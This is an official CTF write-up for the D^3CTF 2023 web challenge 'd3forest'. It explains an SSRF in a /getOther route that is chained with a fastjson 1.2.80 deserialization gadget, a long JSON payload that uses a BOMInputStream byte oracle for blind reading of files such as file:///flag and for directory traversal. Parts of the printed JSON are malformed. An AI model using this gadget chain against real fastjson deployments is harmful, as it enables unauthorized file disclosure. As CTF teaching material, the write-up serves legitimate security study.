Ant x D^3CTF 2023 WEB d3forest Official WP

412

d3forest official wp

  1. You can find an SSRF vulnerability in the /getOther route. such as:
/getOther?route=http://host:port/
  1. Forest requests will automatically deserialize the response data into the desired data type. The default JSON converter used is fastjson. And fastjson version 1.2.80 is vulnerable to a security issue.
  2. so you need to find a gadget(maybe rce). Here is a gadget that reads files.
[{
  "1ue": {
    "@type": "java.lang.Exception",
    "@type": "com.d3ctf.exceptions.ForestRespException"
  }
},
  {
    "2ue": {
      "@type": "java.lang.Class",
      "val": {
        "@type": "com.alibaba.fastjson.JSONObject",
  {
    "@type": "java.lang.String"
    "@type": "com.d3ctf.exceptions.ForestRespException",
    "response": ""
  }
}
},
  {
    "3ue": {
      "@type": "com.dtflys.forest.http.ForestResponse",
      "@type": "com.dtflys.forest.backend.httpclient.response.HttpclientForestResponse",
      "entity": {
        "@type": "org.apache.http.entity.AbstractHttpEntity",
        "@type": "org.apache.http.entity.InputStreamEntity",
        "inStream": {
          "@type": "org.apache.commons.io.input.BOMInputStream",
          "delegate": {
            "@type": "org.apache.commons.io.input.ReaderInputStream",
            "reader": {
              "@type": "jdk.nashorn.api.scripting.URLReader",
              "url": "file:///flag"
            },
            "charsetName": "UTF-8",
            "bufferSize": 1024
          },
          "boms": [
            {
              "@type": "org.apache.commons.io.ByteOrderMark",
              "charsetName": "UTF-8",
              "bytes": [
                ${exp}
              ]
            }
          ]
        }
      }
    }
  },
  {
    "4ue": {
      "$ref": "$[2].3ue.entity.inStream"
    }
  },
  {
    "5ue": {
      "$ref": "$[3].4ue.bOM.bytes"
    }
  },
  {
    "6ue": {
      "@type": "com.dtflys.forest.backend.httpclient.response.HttpclientForestResponse",
      "entity": {
        "@type": "org.apache.http.entity.InputStreamEntity",
        "inStream": {
          "@type": "org.apache.commons.io.input.BOMInputStream",
          "delegate": {
            "@type": "org.apache.commons.io.input.ReaderInputStream",
            "reader": {
              "@type": "org.apache.commons.io.input.CharSequenceReader",
              "charSequence": {
                "@type": "java.lang.String"
  {
    "$ref": "$[4].5ue"
  },
  "start"
  :
  0,
  "end"
  :
  0
  },
  "charsetName"
  :
  "UTF-8",
  "bufferSize"
  :
  1024
  },
  "boms"
  :
  [
    {
      "@type": "org.apache.commons.io.ByteOrderMark",
      "charsetName": "UTF-8",
      "bytes": [
        1
      ]
    }
  ]
  }
}

}
}
]

  1. This gadget will echo different responses depending on whether or not the content of ${exp} is correct, so you can write a script to conduct blind injection. Due to the Java file protocol trick, it is possible to traverse directories and read files.
  2. Thus, replace the content of ${exp} with bytes and attempt your exp. this is my demo(https://github.com/luelueking/My-CTF-Challenges/tree/main/D3CTF-2023/d3forest-exp).
  • Access the root directory files using "file:///" to traverse through them and visit vps:8002/exp. iMk6Nb.png
  • transform byte to String iMkGuz.png
  • lastly,use "file:///flag" to get flag